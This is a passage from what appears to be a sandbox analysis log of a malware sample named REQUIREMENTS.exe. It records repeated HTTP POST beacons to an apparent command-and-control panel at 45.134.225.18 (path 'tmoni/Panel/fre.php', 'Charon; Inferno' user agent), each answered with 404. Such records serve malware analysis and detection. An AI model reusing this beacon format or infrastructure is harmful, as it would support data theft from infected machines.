                149192.168.2.54988445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                15192.168.2.54973645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:30.817864895 CET98OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:30.903669119 CET99INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:31 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                150192.168.2.54988545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                151192.168.2.54988645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                152192.168.2.54988745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                153192.168.2.54988845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                154192.168.2.54988945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                155192.168.2.54989045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                156192.168.2.54989145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                157192.168.2.54989245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                158192.168.2.54989345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                159192.168.2.54989445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                16192.168.2.54973745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:31.118491888 CET99OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:31.204412937 CET100INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:31 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                160192.168.2.54989545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                161192.168.2.54989645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                162192.168.2.54989745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                163192.168.2.54989845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                164192.168.2.54989945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                165192.168.2.54990045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                166192.168.2.54990145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                167192.168.2.54990245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                168192.168.2.54990345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                169192.168.2.54990445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                17192.168.2.54973945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:31.421359062 CET101OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:31.504411936 CET101INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:31 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                170192.168.2.54990545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                171192.168.2.54990645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                172192.168.2.54990745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                173192.168.2.54990845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                174192.168.2.54990945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                175192.168.2.54991045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                176192.168.2.54991145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                177192.168.2.54991245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                178192.168.2.54991345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                179192.168.2.54991445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                18192.168.2.54974045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:31.707667112 CET102OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:31.793675900 CET103INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:31 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                180192.168.2.54991545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                181192.168.2.54991645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                182192.168.2.54991745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                183192.168.2.54991845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                184192.168.2.54991945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                185192.168.2.54992045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                186192.168.2.54992145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                187192.168.2.54992245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                188192.168.2.54992345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                189192.168.2.54992445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                19192.168.2.54974145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:32.001071930 CET103OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:32.087270975 CET104INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:32 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                190192.168.2.54992545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                191192.168.2.54992645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                192192.168.2.54992745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                193192.168.2.54992845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                194192.168.2.54992945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                195192.168.2.54993045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                196192.168.2.54993145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                197192.168.2.54993245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                198192.168.2.54993345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                199192.168.2.54993445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.54972245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:27.056194067 CET80OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:27.141437054 CET80INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:27 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                20192.168.2.54974245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:32.303787947 CET105OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:32.389194965 CET105INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:32 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                200192.168.2.54993545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                201192.168.2.54993645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                202192.168.2.54993745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                203192.168.2.54993845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                204192.168.2.54993945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                205192.168.2.54994045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                206192.168.2.54994145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                207192.168.2.54994245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                208192.168.2.54994345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                209192.168.2.54994445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                21192.168.2.54974345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:32.584072113 CET106OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:32.671111107 CET108INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:32 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                210192.168.2.54994545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                211192.168.2.54994645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                212192.168.2.54994745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                213192.168.2.54994845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                214192.168.2.54994945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                215192.168.2.54995045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                216192.168.2.54995145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                217192.168.2.54995245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                218192.168.2.54995345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                219192.168.2.54995445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                22192.168.2.54974545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:32.889249086 CET115OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:32.979506969 CET117INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:33 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                220192.168.2.54995545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                221192.168.2.54995645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                222192.168.2.54995745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                223192.168.2.54995845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                224192.168.2.54995945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                225192.168.2.54996045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                226192.168.2.54996145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                227192.168.2.54996245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                228192.168.2.54996345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                229192.168.2.54996445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                23192.168.2.54974645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:33.200973988 CET118OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:33.287636995 CET119INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:33 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                230192.168.2.54996545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                231192.168.2.54996645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                232192.168.2.54996745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                233192.168.2.54996845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                234192.168.2.54996945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                235192.168.2.54997045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                236192.168.2.54997145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                237192.168.2.54997245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                238192.168.2.54997445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                239192.168.2.54997545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                24192.168.2.54974745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:33.508634090 CET120OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:33.586697102 CET120INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:33 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                240192.168.2.54997645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                241192.168.2.54997745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                242192.168.2.54997845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                243192.168.2.54997945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                244192.168.2.54998045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                245192.168.2.54998145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                246192.168.2.54998245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                247192.168.2.54998345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                248192.168.2.54998445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                249192.168.2.54998545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                25192.168.2.54974845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:33.797663927 CET121OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:33.883140087 CET121INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:34 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                250192.168.2.54998645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                251192.168.2.54998745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                252192.168.2.54998845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                253192.168.2.54998945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
